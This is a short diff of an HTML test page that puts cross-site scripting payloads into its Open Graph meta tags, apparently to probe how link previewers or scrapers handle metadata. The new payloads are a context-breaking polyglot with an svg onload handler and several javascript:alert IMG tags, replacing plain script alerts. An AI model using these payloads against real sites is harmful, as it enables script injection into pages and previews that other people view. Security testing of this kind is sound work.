--- a/1111.html
+++ b/1111.html
@@ -5,10 +5,10 @@
 <meta name="description" content="SEO Test meta-Title-tag" />
 <meta name="keywords" content="SEO, Test, meta, Title, tag" />
 
-<meta property="og:title" content="<script>alert('title');</script>">
-<meta property="og:site_name" content="<script>alert('name');</script>">
+<meta property="og:title" content="javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>">
+<meta property="og:site_name" content="<IMG SRC="javascript:alert('XSS');">">
 <meta property="og:url" content="https://hadariel.space/1111.html">
-<meta property="og:description" content="<script>alert('desc');</script>">
+<meta property="og:description" content="<IMG SRC=javascript:alert('XSS')>">
 <meta property="og:type" content="website">
 <meta property="og:image" content="">
 
